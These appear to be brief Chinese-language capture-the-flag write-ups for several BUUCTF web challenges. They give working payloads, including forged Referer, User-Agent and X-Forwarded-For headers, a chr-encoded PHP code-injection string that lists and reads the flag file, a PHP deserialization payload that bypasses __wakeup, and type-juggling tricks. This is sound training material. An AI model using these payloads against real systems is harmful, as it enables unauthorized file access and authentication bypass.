[极客大挑战 2019]Http
- 打开burpsuite 对网址抓包,并利用重发器查看源代码
- 找到了a标签,跳转地点为Secret.php
- 修改http头 GET后面加上/Secret.php
- 回显结果如图
5.修改http头 加上Referer:https://Sycsecret.buuoj.cn
6.修改http头 根据上步回显修改浏览器为Syclover
回显为No!!! you can only read this locally!!!
7.http头中添加X-Forwarded-For:127.0.0.1 后得到flag
[RoarCTF 2019]Easy Calc
- 输入1’和1”均无报错
- 打开源码,进入提到的calc.php界面
- 构造函数/calc.php? num=2;var_dump(scandir(chr(47))) 发现f1agg
- calc.php? %20num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
[极客大挑战 2019]PHP
- 扫描网址,下载www.zip
- 观察发现,当username为admin,password为100时,能得到flag
- 序列化一个对象O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}因为变量均为私有,加%00.当析构函数销毁该对象时,就能得到flag了
- 参数改为3,绕过wakeup() ?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;},得flag
[ACTF2020 新生赛]BackupFile
- 扫描目录,找到了bak,常用备份文件后缀名。下载后得源码
2.查看后,传入key=123,即得flag
[极客大挑战 2019]BuyFlag
- 打开菜单中的pay flag,查看源代码
- 抓包后,因不是学生,试着修改cookie,user改为1,成功
- 然后改为post,弱比较,所以password为123xx
- money太长太短都不行,直接科学计数法10e9 得flag